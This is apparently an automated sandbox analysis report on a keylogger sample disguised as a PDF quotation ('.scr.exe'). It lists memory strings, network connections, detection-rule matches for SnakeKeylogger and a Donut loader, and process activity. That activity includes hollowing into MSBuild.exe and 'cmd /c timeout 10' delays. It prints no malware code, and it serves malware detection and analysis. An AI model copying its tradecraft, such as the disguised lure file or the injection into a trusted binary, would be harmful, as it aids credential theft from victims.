Source: MSBuild.exe, 0000000A.00000002.2914938706.00000250F220F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2908019258.00000250E221F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2914938706.00000250F2489000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2914938706.00000250F23B3000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2914938706.00000250F21C2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2914938706.00000250F2237000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2914938706.00000250F2366000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: MSBuild.exe, 0000000A.00000002.2914938706.00000250F21C8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2914938706.00000250F2212000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2914938706.00000250F219D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2914938706.00000250F2464000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2914938706.00000250F2341000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2914938706.00000250F236C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: MSBuild.exe, 0000000A.00000002.2914938706.00000250F220F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2908019258.00000250E221F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2914938706.00000250F2489000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2914938706.00000250F23B3000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2914938706.00000250F21C2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2914938706.00000250F2237000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2914938706.00000250F2366000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: MSBuild.exe, 0000000A.00000002.2914938706.00000250F21C8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2914938706.00000250F2212000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2914938706.00000250F219D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2914938706.00000250F2464000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2914938706.00000250F2341000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2914938706.00000250F236C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: MSBuild.exe, 0000000A.00000002.2914938706.00000250F2109000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: MSBuild.exe, 0000000A.00000002.2914938706.00000250F2109000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: MSBuild.exe, 0000000A.00000002.2908019258.00000250E2331000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: MSBuild.exe, 0000000A.00000002.2908019258.00000250E232C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/8

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49757 version: TLS 1.2

System Summary

Source: 10.2.MSBuild.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.MSBuild.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.MSBuild.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747dfae18.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747dfae18.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747dfae18.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747d82da8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747d82da8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747daade0.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747daade0.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747d82da8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747daade0.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000000.00000002.2344366923.0000013750870000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0000000A.00000002.2905870763.0000000140002000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.2343518240.000001375067E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.2339758590.0000013747D81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000000.00000002.2339758590.0000013747D81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe PID: 7404, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: MSBuild.exe PID: 8188, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Source: initial sample

Static PE information: Filename: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe

Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe

Code function: 0_2_00007FFD9BC1CA09 NtUnmapViewOfSection,

0_2_00007FFD9BC1CA09

Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Code function: 0_2_000001375093FF56		0_2_000001375093FF56
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Code function: 0_2_000001375093FB7A		0_2_000001375093FB7A
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Code function: 0_2_000001375093EC9E		0_2_000001375093EC9E
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Code function: 0_2_0000013750940E3A		0_2_0000013750940E3A
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Code function: 0_2_0000013750940386		0_2_0000013750940386
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Code function: 0_2_00007FFD9BC02529		0_2_00007FFD9BC02529
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Code function: 0_2_00007FFD9BC0FCDD		0_2_00007FFD9BC0FCDD
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Code function: 0_2_00007FFD9BC0068D		0_2_00007FFD9BC0068D

Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe

Static PE information: No import functions for PE file found

Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2333864678.00000137380C8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs QUOTATION_JULQTRA071244#U00b7PDF.scr.exe
Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2339758590.0000013747D33000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs QUOTATION_JULQTRA071244#U00b7PDF.scr.exe
Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000000.1651967542.0000013735DFD000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameGyica.exe@ vs QUOTATION_JULQTRA071244#U00b7PDF.scr.exe
Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2343518240.000001375067E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameAdelina.exe0 vs QUOTATION_JULQTRA071244#U00b7PDF.scr.exe
Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2346139310.0000013750B90000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameNscdjghctwr.dll" vs QUOTATION_JULQTRA071244#U00b7PDF.scr.exe
Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2339758590.0000013747D81000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs QUOTATION_JULQTRA071244#U00b7PDF.scr.exe
Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2339758590.0000013747D81000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameAdelina.exe0 vs QUOTATION_JULQTRA071244#U00b7PDF.scr.exe
Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2347202995.0000013750D40000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs QUOTATION_JULQTRA071244#U00b7PDF.scr.exe
Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2343226980.0000013750490000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs QUOTATION_JULQTRA071244#U00b7PDF.scr.exe
Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2339758590.0000013747B81000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs QUOTATION_JULQTRA071244#U00b7PDF.scr.exe
Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2333864678.000001373817B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameAdelina.exe0 vs QUOTATION_JULQTRA071244#U00b7PDF.scr.exe
Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Binary or memory string: OriginalFilenameGyica.exe@ vs QUOTATION_JULQTRA071244#U00b7PDF.scr.exe

Source: 10.2.MSBuild.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.MSBuild.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.MSBuild.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747dfae18.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747dfae18.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747dfae18.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747d82da8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747d82da8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747daade0.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747daade0.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747d82da8.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747daade0.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000000.00000002.2344366923.0000013750870000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0000000A.00000002.2905870763.0000000140002000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.2343518240.000001375067E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.2339758590.0000013747D81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000000.00000002.2339758590.0000013747D81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe PID: 7404, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: MSBuild.exe PID: 8188, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13750d40000.13.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13750d40000.13.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13750d40000.13.raw.unpack, Task.cs	Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13750d40000.13.raw.unpack, TaskService.cs	Task registration methods: 'CreateFromToken'
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747daade0.7.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747daade0.7.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'

Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747daade0.7.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13750d40000.13.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747daade0.7.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747daade0.7.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747daade0.7.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13750d40000.13.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13750d40000.13.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747daade0.7.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747daade0.7.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13750d40000.13.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13750d40000.13.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13750d40000.13.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)

Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, TcpPacket.cs	Suspicious method names: .TcpPacket.DecodePayload
Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, MacFrame.cs	Suspicious method names: .MacFrame.GetAvailablePayloadLength
Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, InternetLinkLayerPacket.cs	Suspicious method names: .InternetLinkLayerPacket.GetInnerPayload

Source: classification engine

Classification label: mal100.spre.troj.spyw.evad.winEXE@13/0@6/5

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7672:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7472:120:WilError_03

Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe

Static file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%

Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe

Virustotal: Detection: 21%

Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe

File read: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe:Zone.Identifier

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe "C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe"
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 10
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout 10
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 10
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout 10
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 10			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 10			Jump to behavior
